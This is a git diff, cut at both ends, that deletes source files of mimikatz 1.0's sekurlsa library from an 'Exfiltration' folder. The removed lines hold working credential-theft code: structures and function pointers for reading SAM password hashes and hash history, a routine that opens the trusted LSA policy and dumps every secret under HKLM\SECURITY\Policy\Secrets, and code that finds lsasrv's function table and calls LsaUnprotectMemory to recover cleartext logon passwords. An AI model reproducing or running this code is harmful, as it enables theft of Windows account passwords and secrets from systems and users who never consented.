-		const BYTE * monPtr = reinterpret_cast<const BYTE *>(&maChaine.c_str()[i]);
-		for(int j = 0 ; j < min(sizeof(source), sizeof(replac)) ; j+=2)
-		{
-			if(*monPtr == source[j] && *(monPtr + 1) == source[j+1])
-			{
-				*const_cast<BYTE *>(monPtr) = replac[j];
-				*const_cast<BYTE *>(monPtr + 1) = replac[j + 1];
-				break;
-			}
-		}
-	}
-}
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h
deleted file mode 100644
index 870aa4d..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h
+++ /dev/null
@@ -1,210 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "kmodel.h"
-#include "mod_text.h"
-#include <sstream>
-#include <iomanip>
-
-bool searchSAMFuncs();
-__kextdll bool __cdecl getSAMFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments);
-__kextdll bool __cdecl getLocalAccounts(mod_pipe * monPipe, vector<wstring> * mesArguments);
-
-#define SAM_SERVER_CONNECT							0x00000001
-#define DOMAIN_ALL_ACCESS							0x000F07FF	 
-#define USER_ALL_ACCESS								0x000F07FF	 
-
-#define USER_ACCOUNT_DISABLED						0x00000001
-#define USER_PASSWORD_NOT_REQUIRED					0x00000004
-#define USER_NORMAL_ACCOUNT							0x00000010
-#define USER_WORKSTATION_TRUST_ACCOUNT				0x00000080
-#define USER_SERVER_TRUST_ACCOUNT					0x00000100
-#define USER_DONT_EXPIRE_PASSWORD					0x00000200
-#define USER_ACCOUNT_AUTO_LOCKED					0x00000400
-#define USER_SMARTCARD_REQUIRED						0x00001000
-#define USER_TRUSTED_FOR_DELEGATION					0x00002000
-#define USER_PASSWORD_EXPIRED						0x00020000
-
-typedef struct _WUserAllInformation
-{
-	unsigned long UserId;
-	wstring UserName;
-	wstring DomaineName;
-	wstring FullName;
-	bool isActif;
-	bool isLocked;
-	wstring TypeCompte;
-	wstring UserComment;
-	wstring AdminComment;
-	wstring AccountExpires;
-	wstring AccountExpires_strict;
-	wstring WorkStations;
-
-	wstring HomeDirectory;
-	wstring HomeDirectoryDrive;
-	wstring ProfilePath;
-	wstring ScriptPath;
-
-	unsigned short LogonCount;
-	unsigned short BadPasswordCount;
-	wstring LastLogon;
-	wstring LastLogon_strict;
-	wstring LastLogoff;
-	wstring LastLogoff_strict;
-
-	wstring PasswordLastSet;
-	wstring PasswordLastSet_strict;
-	bool isPasswordNotExpire;
-	bool isPasswordNotRequired;
-	bool isPasswordExpired;
-	wstring PasswordCanChange;
-	wstring PasswordCanChange_strict;
-	wstring 
PasswordMustChange;
-	wstring PasswordMustChange_strict;
-
-	bool LmPasswordPresent;
-	wstring LmOwfPassword;
-	bool NtPasswordPresent;
-	wstring NtOwfPassword;
-} WUserAllInformation, *PUserAllInformation;
-
-typedef struct _WHashHistory
-{
-	DWORD unkVersion;
-	unsigned short currentLMsize;
-	unsigned short unkCurrentLMsize;
-	DWORD unkCurLM;
-	BYTE EncLMhash[16];
-
-	unsigned short currentNTLMsize;
-	unsigned short unkCurrentNTLMsize;
-	DWORD unkCurNTLM;
-	BYTE EncNTLMhash[16];
-	 
-	unsigned short histLMsize;
-	unsigned short unkhistLMsize;
-	DWORD unkHistLM;
-
-	unsigned short histNTLMsize;
-	unsigned short unkhistNTLMsize;
-	DWORD unkHistNTLM;
-	BYTE hashs[24][16];
-} WHashHistory, *PWHashHistory;
-
-DECLARE_HANDLE(HUSER);
-DECLARE_HANDLE(HSAM);
-DECLARE_HANDLE(HDOMAIN);
-
-typedef struct _SAMPR_RID_ENUMERATION
-{
-	unsigned long RelativeId;
-	LSA_UNICODE_STRING Name;
-} SAMPR_RID_ENUMERATION, *PSAMPR_RID_ENUMERATION;
-
-typedef struct _SAMPR_ENUMERATION_BUFFER
-{
-	unsigned long EntriesRead;
-	[size_is(EntriesRead)] PSAMPR_RID_ENUMERATION Buffer;
-} SAMPR_ENUMERATION_BUFFER, *PSAMPR_ENUMERATION_BUFFER;
-
-typedef enum _USER_INFORMATION_CLASS
-{
-	UserInternal1Information = 18,
-	UserAllInformation = 21,
-} USER_INFORMATION_CLASS, *PUSER_INFORMATION_CLASS;
-
-typedef struct _ENCRYPTED_LM_OWF_PASSWORD
-{
-	BYTE data[16];
-} ENCRYPTED_LM_OWF_PASSWORD, *PENCRYPTED_LM_OWF_PASSWORD, ENCRYPTED_NT_OWF_PASSWORD,  *PENCRYPTED_NT_OWF_PASSWORD;
-
-typedef struct _SAMPR_USER_INTERNAL1_INFORMATION
-{
-	ENCRYPTED_NT_OWF_PASSWORD EncryptedNtOwfPassword;
-	ENCRYPTED_LM_OWF_PASSWORD EncryptedLmOwfPassword;
-	unsigned char NtPasswordPresent;
-	unsigned char LmPasswordPresent;
-	unsigned char PasswordExpired;
-} SAMPR_USER_INTERNAL1_INFORMATION, *PSAMPR_USER_INTERNAL1_INFORMATION;
-
-typedef struct _OLD_LARGE_INTEGER {
-	unsigned long LowPart;
-	long HighPart;
-} OLD_LARGE_INTEGER, *POLD_LARGE_INTEGER;
-
-typedef struct _SAMPR_SR_SECURITY_DESCRIPTOR {
-	[range(0, 256 * 1024)] 
unsigned long Length;
-	[size_is(Length)] unsigned char* SecurityDescriptor;
-} SAMPR_SR_SECURITY_DESCRIPTOR, *PSAMPR_SR_SECURITY_DESCRIPTOR;
-
-typedef struct _SAMPR_LOGON_HOURS {
-	unsigned short UnitsPerWeek;
-	[size_is(1260), length_is((UnitsPerWeek+7)/8)] 
-	unsigned char* LogonHours;
-} SAMPR_LOGON_HOURS, *PSAMPR_LOGON_HOURS;
-
-typedef struct _SAMPR_USER_ALL_INFORMATION
-{
-	OLD_LARGE_INTEGER LastLogon;
-	OLD_LARGE_INTEGER LastLogoff;
-	OLD_LARGE_INTEGER PasswordLastSet;
-	OLD_LARGE_INTEGER AccountExpires;
-	OLD_LARGE_INTEGER PasswordCanChange;
-	OLD_LARGE_INTEGER PasswordMustChange;
-	LSA_UNICODE_STRING UserName;
-	LSA_UNICODE_STRING FullName;
-	LSA_UNICODE_STRING HomeDirectory;
-	LSA_UNICODE_STRING HomeDirectoryDrive;
-	LSA_UNICODE_STRING ScriptPath;
-	LSA_UNICODE_STRING ProfilePath;
-	LSA_UNICODE_STRING AdminComment;
-	LSA_UNICODE_STRING WorkStations;
-	LSA_UNICODE_STRING UserComment;
-	LSA_UNICODE_STRING Parameters;
-	LSA_UNICODE_STRING LmOwfPassword;
-	LSA_UNICODE_STRING NtOwfPassword;
-	LSA_UNICODE_STRING PrivateData;
-	SAMPR_SR_SECURITY_DESCRIPTOR SecurityDescriptor;
-	unsigned long UserId;
-	unsigned long PrimaryGroupId;
-	unsigned long UserAccountControl;
-	unsigned long WhichFields;
-	SAMPR_LOGON_HOURS LogonHours;
-	unsigned short BadPasswordCount;
-	unsigned short LogonCount;
-	unsigned short CountryCode;
-	unsigned short CodePage;
-	unsigned char LmPasswordPresent;
-	unsigned char NtPasswordPresent;
-	unsigned char PasswordExpired;
-	unsigned char PrivateDataSensitive;
-} SAMPR_USER_ALL_INFORMATION, *PSAMPR_USER_ALL_INFORMATION;
-
-typedef [switch_is(USER_INFORMATION_CLASS)] union _SAMPR_USER_INFO_BUFFER	/* http://msdn.microsoft.com/en-us/library/cc211885.aspx */
-{
-	[case(UserInternal1Information)]
-	SAMPR_USER_INTERNAL1_INFORMATION Internal1;
-	[case(UserAllInformation)]
-    SAMPR_USER_ALL_INFORMATION All;
-} SAMPR_USER_INFO_BUFFER, *PSAMPR_USER_INFO_BUFFER;
-
-WUserAllInformation	UserInformationsToStruct(USER_INFORMATION_CLASS type, 
PSAMPR_USER_INFO_BUFFER & monPtr);
-bool				descrToPipeInformations(mod_pipe * monPipe, USER_INFORMATION_CLASS type, WUserAllInformation & mesInfos, bool isCSV = false);
-bool				descrUserHistoryToPipe(mod_pipe * monPipe, DWORD rid, wstring monUserName, wstring domainName, HUSER handleUser, USER_INFORMATION_CLASS type, bool isCSV = false);
-wstring				toTimeFromOLD_LARGE_INTEGER(OLD_LARGE_INTEGER & monInt, bool isStrict = false);
-wstring				protectMe(wstring &maChaine);
-void				correctMe(wstring &maChaine);
-
-typedef NTSTATUS (WINAPI * PSAM_I_CONNECT) (DWORD, HSAM *, DWORD, DWORD);
-typedef NTSTATUS (WINAPI * PSAM_R_OPEN_DOMAIN) (HSAM, DWORD dwAccess, PSID, HDOMAIN*);
-typedef NTSTATUS (WINAPI * PSAM_R_OPEN_USER) (HDOMAIN, DWORD dwAccess, DWORD, HUSER*);
-typedef NTSTATUS (WINAPI * PSAM_R_ENUMERATE_USERS_IN_DOMAIN) (HDOMAIN, DWORD*, DWORD, PSAMPR_ENUMERATION_BUFFER *, DWORD, PVOID);
-typedef NTSTATUS (WINAPI * PSAM_R_QUERY_INFORMATION_USER) (HUSER, DWORD, PSAMPR_USER_INFO_BUFFER *);
-typedef HLOCAL   (WINAPI * PSAM_I_FREE_SAMPR_USER_INFO_BUFFER) (PVOID, DWORD);
-typedef HLOCAL   (WINAPI * PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER) (PSAMPR_ENUMERATION_BUFFER);
-typedef NTSTATUS (WINAPI * PSAM_R_CLOSE_HANDLE) (PHANDLE);
-typedef NTSTATUS (WINAPI * PSAM_I_GET_PRIVATE_DATA) (HUSER, DWORD *, DWORD *, DWORD *, PWHashHistory *);
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp
deleted file mode 100644
index 06d8664..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp
+++ /dev/null
@@ -1,99 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "secrets.h"
-
-PLSA_I_OPEN_POLICY_TRUSTED LsaIOpenPolicyTrusted = NULL;
-PLSA_R_OPEN_SECRET LsarOpenSecret = NULL;
-PLSA_R_QUERY_SECRET LsarQuerySecret = NULL;
-PLSA_R_CLOSE LsarClose = NULL;
-
-bool searchSECFuncs()
-{
-	if(!(LsaIOpenPolicyTrusted && LsarOpenSecret && LsarQuerySecret && LsarClose))
-	{
-		if(HMODULE hLsasrv = GetModuleHandle(L"lsasrv"))
-		{
-			LsaIOpenPolicyTrusted	= reinterpret_cast<PLSA_I_OPEN_POLICY_TRUSTED>(GetProcAddress(hLsasrv, "LsaIOpenPolicyTrusted"));
-			LsarOpenSecret			= reinterpret_cast<PLSA_R_OPEN_SECRET>(GetProcAddress(hLsasrv, "LsarOpenSecret"));
-			LsarQuerySecret			= reinterpret_cast<PLSA_R_QUERY_SECRET>(GetProcAddress(hLsasrv, "LsarQuerySecret"));
-			LsarClose				= reinterpret_cast<PLSA_R_CLOSE>(GetProcAddress(hLsasrv, "LsarClose"));
-		}
-		return (LsaIOpenPolicyTrusted && LsarOpenSecret && LsarQuerySecret && LsarClose);
-	}
-	else return true;
-}
-
-__kextdll bool __cdecl getSECFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments)
-{
-	wostringstream monStream;
-	monStream << L"** lsasrv.dll ** ; Statut recherche : " << (searchSECFuncs() ? 
L"OK :)" : L"KO :(") << endl << endl <<
-		L"@LsaIOpenPolicyTrusted = " << LsaIOpenPolicyTrusted << endl <<
-		L"@LsarOpenSecret        = " << LsarOpenSecret << endl <<
-		L"@LsarQuerySecret       = " << LsarQuerySecret << endl <<
-		L"@LsarClose             = " << LsarClose << endl;
-	return sendTo(monPipe, monStream.str());
-}
-
-__kextdll bool __cdecl getSecrets(mod_pipe * monPipe, vector<wstring> * mesArguments)
-{
-	if(searchSECFuncs())
-	{
-		bool sendOk = true;
-		wstring message;
-		LSA_HANDLE hPolicy;
-		 
-		if(NT_SUCCESS(LsaIOpenPolicyTrusted(&hPolicy)))
-		{
-			HKEY hKeysSecrets;
-			if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SECURITY\\Policy\\Secrets", 0, KEY_READ, &hKeysSecrets) == ERROR_SUCCESS)
-			{
-				DWORD nbKey, maxKeySize;
-				if(RegQueryInfoKey(hKeysSecrets, NULL, NULL, NULL, &nbKey, &maxKeySize, NULL, NULL, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
-				{
-					for(DWORD i = 0; (i < nbKey) && sendOk; i++)
-					{
-						DWORD buffsize = (maxKeySize+1) * sizeof(wchar_t);
-						LSA_UNICODE_STRING monNomSecret = {0, 0, new wchar_t[buffsize]};
-						 
-						if(RegEnumKeyEx(hKeysSecrets, i, monNomSecret.Buffer, &buffsize, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
-						{
-							monNomSecret.Length = monNomSecret.MaximumLength = static_cast<USHORT>(buffsize * sizeof(wchar_t));
-							message.assign(L"\nSecret     : "); message.append(mod_text::stringOfSTRING(monNomSecret)); message.push_back(L'\n');
-							 
-							LSA_HANDLE hSecret;
-							if(NT_SUCCESS(LsarOpenSecret(hPolicy, &monNomSecret, SECRET_QUERY_VALUE, &hSecret)))
-							{
-								LSA_SECRET * monSecret = NULL;
-								if(NT_SUCCESS(LsarQuerySecret(hSecret, &monSecret, NULL, NULL, NULL)))
-								{
-									message.append(L"Credential : "); message.append(mod_text::stringOrHex(reinterpret_cast<PBYTE>(monSecret->Buffer), monSecret->Length)); message.push_back(L'\n');
-									LsaFreeMemory(monSecret);
-								}
-								else message.append(L"Erreur : Impossible de récupérer le 
secret\n");
-								LsarClose(&hSecret);
-							}
-							else message.append(L"Erreur : Impossible d\'ouvrir le secret\n");
-						}
-						delete[] monNomSecret.Buffer;
-						sendOk = sendTo(monPipe, message);
-					}
-					message.clear();
-				} else message.assign(L"Erreur : Impossible d\'obtenir des information sur le registre secret\n");
-				RegCloseKey(hKeysSecrets);
-			}
-			else message.assign(L"Erreur : Impossible d\'ouvrir la clé Secrets\n");
-			LsarClose(&hPolicy);
-		}
-		else message.assign(L"Erreur : Impossible d\'ouvrir la politique\n");
-		 
-		if(!message.empty())
-			sendOk = sendTo(monPipe, message);
-		 
-		return sendOk;
-	}
-	else return getSECFunctions(monPipe, mesArguments);
-}
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h
deleted file mode 100644
index cb74837..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h
+++ /dev/null
@@ -1,29 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "kmodel.h"
-#include "mod_text.h"
-#include <wincred.h>
-
-bool searchSECFuncs();
-__kextdll bool __cdecl getSECFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments);
-__kextdll bool __cdecl getSecrets(mod_pipe * monPipe, vector<wstring> * mesArguments);
-
-#define	SECRET_SET_VALUE	0x00000001
-#define	SECRET_QUERY_VALUE	0x00000002
-
-typedef struct _LSA_SECRET
-{
-	DWORD		Length;
-	DWORD		MaximumLength;
-	wchar_t *	Buffer;
-} LSA_SECRET, *PLSA_SECRET;
-
-typedef NTSTATUS (WINAPI * PLSA_I_OPEN_POLICY_TRUSTED)	(LSA_HANDLE * pHPolicy);
-typedef NTSTATUS (WINAPI * PLSA_R_OPEN_SECRET)			(LSA_HANDLE hPolicy, LSA_UNICODE_STRING *, DWORD dwAccess, LSA_HANDLE * hSecret);
-typedef NTSTATUS (WINAPI * PLSA_R_QUERY_SECRET)			(LSA_HANDLE hSecret, PLSA_SECRET * ppSecret, PVOID pCurrentValueSetTime, PLSA_UNICODE_STRING * ppOldSecret, PVOID pOldValueSetTime);
-typedef NTSTATUS (WINAPI * PLSA_R_CLOSE)				(LSA_HANDLE * pHandle);
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp deleted file mode 100644
index 1d07596..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp
+++ /dev/null 
@@ -1,86 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "sekurlsa.h"
-PLSA_SECPKG_FUNCTION_TABLE SeckPkgFunctionTable = NULL;
-
-__kextdll bool __cdecl getDescription(wstring * maDescription)
-{
-	maDescription->assign(L"SekurLSA : librairie de manipulation des données de sécurités dans LSASS\n");
-	return mod_system::getVersion(&mod_system::GLOB_Version);
-}
-
-bool searchLSAFuncs()
-{
-	if(!SeckPkgFunctionTable)
-	{
-		if(HMODULE hLsasrv = GetModuleHandle(L"lsasrv"))
-		{
-			struct {PVOID LsaIRegisterNotification; PVOID LsaICancelNotification;} extractPkgFunctionTable = {GetProcAddress(hLsasrv, "LsaIRegisterNotification"), GetProcAddress(hLsasrv, "LsaICancelNotification")};
-			if(extractPkgFunctionTable.LsaIRegisterNotification && extractPkgFunctionTable.LsaICancelNotification)
-				mod_memory::genericPatternSearch(reinterpret_cast<PBYTE *>(&SeckPkgFunctionTable), L"lsasrv", reinterpret_cast<PBYTE>(&extractPkgFunctionTable), sizeof(extractPkgFunctionTable), - FIELD_OFFSET(LSA_SECPKG_FUNCTION_TABLE, RegisterNotification), NULL, true, true);
-		}
-	}
-	return (SeckPkgFunctionTable != NULL);
-}
-
-wstring getPasswordFromProtectedUnicodeString(LSA_UNICODE_STRING * ptrPass)
-{
-	wstring password;
-	if(ptrPass->Buffer && (ptrPass->Length > 0))
-	{
-		BYTE * monPass = new BYTE[ptrPass->MaximumLength];
-		RtlCopyMemory(monPass, ptrPass->Buffer, ptrPass->MaximumLength);
-		SeckPkgFunctionTable->LsaUnprotectMemory(monPass, ptrPass->MaximumLength);
-		password.assign(mod_text::stringOrHex(reinterpret_cast<PBYTE>(monPass), ptrPass->Length));
-		delete[] monPass;
-	}
-	return password;
-}
-
-bool getLogonData(mod_pipe * monPipe, vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders)
-{
-	bool sendOk = true;
-	PLUID sessions;
-	ULONG count;
-
-	if 
(NT_SUCCESS(LsaEnumerateLogonSessions(&count, &sessions)))
-	{
-		for (ULONG i = 0; i < count && sendOk; i++)
-		{
-			PSECURITY_LOGON_SESSION_DATA sessionData = NULL;
-			if(NT_SUCCESS(LsaGetLogonSessionData(&sessions[i], &sessionData)))
-			{
-				if(sessionData->LogonType != Network)
-				{
-					wostringstream maPremiereReponse;
-					maPremiereReponse << endl <<
-						L"Authentification Id         : "	<< sessions[i].HighPart << L";" << sessions[i].LowPart << endl <<
-						L"Package d\'authentification  : "	<< mod_text::stringOfSTRING(sessionData->AuthenticationPackage) << endl <<
-						L"Utilisateur principal       : "	<< mod_text::stringOfSTRING(sessionData->UserName) << endl <<
-						L"Domaine d\'authentification  : "	<< mod_text::stringOfSTRING(sessionData->LogonDomain) << endl;
-
-					sendOk = sendTo(monPipe, maPremiereReponse.str());
-
-					for(vector<pair<PFN_ENUM_BY_LUID, wstring>>::iterator monProvider = mesProviders->begin(); monProvider != mesProviders->end(); monProvider++)
-					{
-						wostringstream maSecondeReponse;
-						maSecondeReponse << L'\t' << monProvider->second << L" : \t";
-						sendOk = sendTo(monPipe, maSecondeReponse.str());
-						monProvider->first(&sessions[i], monPipe, mesArguments->empty());
-						sendOk = sendTo(monPipe, L"\n");
-					}
-				}
-				LsaFreeReturnBuffer(sessionData);
-			}
-			else sendOk = sendTo(monPipe, L"Erreur : Impossible d\'obtenir les données de session\n");
-		}
-		LsaFreeReturnBuffer(sessions);
-	}
-	else sendOk = sendTo(monPipe, L"Erreur : Impossible d\'énumerer les sessions courantes\n");
-
-	return sendOk;
-}
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h deleted file mode 100644
index c36e173..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h
+++ /dev/null 
@@ -1,23 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "kmodel.h"
-#include "secpkg.h"
-#include "mod_memory.h"
-#include "mod_system.h"
-#include "mod_text.h"
-#include "mod_process.h"
-
-extern PLSA_SECPKG_FUNCTION_TABLE	SeckPkgFunctionTable;
-
-bool searchLSAFuncs();
-__kextdll bool __cdecl getDescription(wstring * maDescription);
-
-typedef bool (WINAPI * PFN_ENUM_BY_LUID) (__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity);
-bool		getLogonData(mod_pipe * monPipe, vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders);
-
-wstring		getPasswordFromProtectedUnicodeString(LSA_UNICODE_STRING * ptrPass);
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rcBinary files differ deleted file mode 100644
index 2243435..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc
+++ /dev/null
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj deleted file mode 100644
index dbea2a6..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj
+++ /dev/null 
@@ -1,154 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{3A436EFD-4FD7-4E5F-B0EC-F9DCCACF1E60}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>sekurlsa</RootNamespace>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <UseOfMfc>Static</UseOfMfc>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <UseOfMfc>Static</UseOfMfc>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup 
Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)$(Platform)\</OutDir>
-    <IntDir>$(Platform)\</IntDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)$(Platform)\</OutDir>
-    <IntDir>$(Platform)\</IntDir>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <Optimization>Full</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;PSAPI_VERSION=1;_WINDOWS;_USRDLL;SEKURLSA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
-      <StringPooling>true</StringPooling>
-      <ExceptionHandling>false</ExceptionHandling>
-      <FloatingPointModel>Fast</FloatingPointModel>
-      <FloatingPointExceptions>false</FloatingPointExceptions>
-      <CreateHotpatchableImage>false</CreateHotpatchableImage>
-      <ErrorReporting>None</ErrorReporting>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>false</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      
<OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>psapi.lib;secur32.lib;advapi32.lib;shlwapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <LinkErrorReporting>NoErrorReport</LinkErrorReporting>
-      <ModuleDefinitionFile>
-      </ModuleDefinitionFile>
-    </Link>
-    <ResourceCompile>
-      <Culture>0x040c</Culture>
-    </ResourceCompile>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <Optimization>Full</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;PSAPI_VERSION=1;_WINDOWS;_USRDLL;SEKURLSA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
-      <StringPooling>true</StringPooling>
-      <ExceptionHandling>false</ExceptionHandling>
-      <FloatingPointModel>Fast</FloatingPointModel>
-      <FloatingPointExceptions>false</FloatingPointExceptions>
-      <CreateHotpatchableImage>false</CreateHotpatchableImage>
-      <ErrorReporting>None</ErrorReporting>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>false</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>psapi.lib;secur32.lib;advapi32.lib;shlwapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <LinkErrorReporting>NoErrorReport</LinkErrorReporting>
-      <ModuleDefinitionFile>
-      </ModuleDefinitionFile>
-    </Link>
-    <ResourceCompile>
-      <Culture>0x040c</Culture>
-    
</ResourceCompile>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\commun\kmodel.cpp" />
-    <ClCompile Include="..\..\modules\mod_memory.cpp" />
-    <ClCompile Include="..\..\modules\mod_parseur.cpp" />
-    <ClCompile Include="..\..\modules\mod_pipe.cpp" />
-    <ClCompile Include="..\..\modules\mod_process.cpp" />
-    <ClCompile Include="..\..\modules\mod_system.cpp" />
-    <ClCompile Include="..\..\modules\mod_text.cpp" />
-    <ClCompile Include="modules\credman.cpp" />
-    <ClCompile Include="modules\incognito.cpp" />
-    <ClCompile Include="modules\sam.cpp" />
-    <ClCompile Include="modules\secrets.cpp" />
-    <ClCompile Include="Security Packages\msv1_0.cpp" />
-    <ClCompile Include="Security Packages\msv1_0_helper.cpp" />
-    <ClCompile Include="sekurlsa.cpp" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\commun\kmodel.h" />
